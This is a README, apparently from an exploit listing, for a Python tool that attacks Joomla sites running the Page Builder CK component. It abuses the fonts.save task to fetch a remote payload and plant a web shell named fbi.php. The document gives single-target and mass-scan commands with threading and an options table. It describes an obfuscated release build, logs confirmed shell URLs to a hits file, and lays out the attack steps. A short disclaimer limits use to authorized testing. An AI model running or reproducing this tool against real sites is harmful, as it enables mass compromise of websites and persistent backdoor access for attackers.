## https://sploitus.com/exploit?id=9D8EF289-CD29-521C-A5DA-0E5AF14AF08F
# Page Builder CK โ fonts.save RCE Probe
**BlackHat Team** proof-of-concept scanner for the Joomla **Page Builder CK** `fonts.save` vulnerability.
> **Author:** [@mrzblackhat](https://t.me/mrzblackhat)
> **Team:** BlackHat Team
> **Credits:** Peyman Siyahi ยท MR.PERSIA
---
## Overview
This tool probes Joomla sites running the vulnerable **com_pagebuilderck** component. It abuses the `fonts.save` task to pull a remote payload and writes a web shell under:
```
media/com_pagebuilderck/gfonts/fbi.php
```
RCE is confirmed when the uploaded shell responds with an HTML `` containing **`Fbi Shell`**.
Supports **single-target** and **mass** scanning with threaded workers and instant hit saving.
---
## Requirements
- Python **3.10+**
- `requests`
- `urllib3`
```bash
pip install requests urllib3
```
---
## Usage
### Single target
```bash
python3 poc.py --url https://example.com --insecure
```
### Mass scan
```bash
python3 poc.py --mass targets.txt --insecure --threads 20 --timeout 12
```
`targets.txt` โ one URL per line. Lines after `#` are ignored.
### Options
| Flag | Description |
|------|-------------|
| `--url URL` | Scan a single target |
| `--mass FILE` | Scan targets from a file |
| `--insecure` | Skip TLS certificate verification |
| `--threads N` | Worker threads for mass mode (default: `20`) |
| `--timeout N` | HTTP timeout in seconds (default: `12`) |
| `--output FILE` | Save confirmed shell URLs (default: `hits.txt`) |
---
## Output
- **HIT** โ shell uploaded and PHP executed; title contains `Fbi Shell`
- **PART** โ file written but PHP not executed
- **MISS** โ exploit not confirmed
Confirmed shell URLs are appended to the output file immediately.
---
## Project files
| File | Description |
|------|-------------|
| `poc.py` | Obfuscated release build (run this) |
| `hits.txt` | Default output for confirmed shells |
### Rebuild after editing source
```bash
python3 _build_obf.py
```
---
## How it works
1. Fetch homepage and extract Joomla CSRF token
2. `POST` to `index.php` with `option=com_pagebuilderck&task=fonts.save`
3. Remote `font.css` callback triggers shell write to `gfonts/fbi.php`
4. `GET` the shell path and verify `` contains `Fbi Shell`
---
## Disclaimer
This tool is provided for **authorized security research and penetration testing only**.
Unauthorized access to computer systems is illegal. The authors and **BlackHat Team** are not responsible for misuse. Only test systems you own or have explicit written permission to assess.
---
## Contact
- **Telegram:** [https://t.me/mrzblackhat](https://t.me/mrzblackhat)
- **Handle:** `@mrzblackhat`
**BlackHat Team** โ Peyman Siyahi ยท MR.PERSIA
---
*Original research and tooling by [@mrzblackhat](https://t.me/mrzblackhat). Do not redistribute modified copies without attribution.*